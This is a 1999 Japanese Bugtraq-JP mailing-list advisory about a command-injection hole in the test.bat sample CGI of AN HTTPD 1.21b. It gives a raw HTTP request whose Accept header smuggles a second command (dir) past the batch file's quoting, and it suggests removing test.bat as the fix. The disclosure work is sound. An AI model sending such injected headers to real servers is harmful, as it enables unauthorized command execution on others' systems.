Return-Path: owner-bugtraq-jp@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-2022-jp"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Message-ID:  <007b01bf2c66$9d8e53a0$8e90a4d2@local>
Date:         Fri, 12 Nov 1999 02:03:00 +0900
Reply-To: D Layer <dome@KOGANET.NE.JP>
Sender: BUGTRAQ-JP List <BUGTRAQ-JP@SECURITYFOCUS.COM>
From: D Layer <dome@KOGANET.NE.JP>
Subject:      AN HTTPD 1.21b - test.bat & malformed accept header
X-To:         BUGTRAQ-JP@SECURITYFOCUS.COM
To: BUGTRAQ-JP@SECURITYFOCUS.COM

初めまして。D Layerです。

AN HTTPD 1.21b(最新版)に付属するcgiサンプルであるtest.batの脆弱性について報告します。

現在、test.bat内の環境変数を出力する部分は
> echo HTTP_ACCEPT="%HTTP_ACCEPT%"
のよにクォートされ、DOSのメタ文字が無効化されていますが、
HTTPセッションにおいて異常なacceptヘッダを送信することにより
クォートを無効化しメタ文字を有効にすることが出来ます。

-- Begin --
GET /cgi-bin/test.bat HTTP/1.0
accept:"|dir"

-- End   --

上記のようなリクエストを発行することにより、
> echo HTTP_ACCEPT="%HTTP_ACCEPT%"
の部分が
> echo HTTP_ACCEPT=""|dir""
のように展開され、結果としてdirコマンドが実行されます。

test.batを削除するなどして、test.batを外部から参照できなくする事で
この脆弱性を回避することが出来ます。

-/ D Layer - "L"
/- mailto:phyx@i.am
-- http://layer.webprovider.com/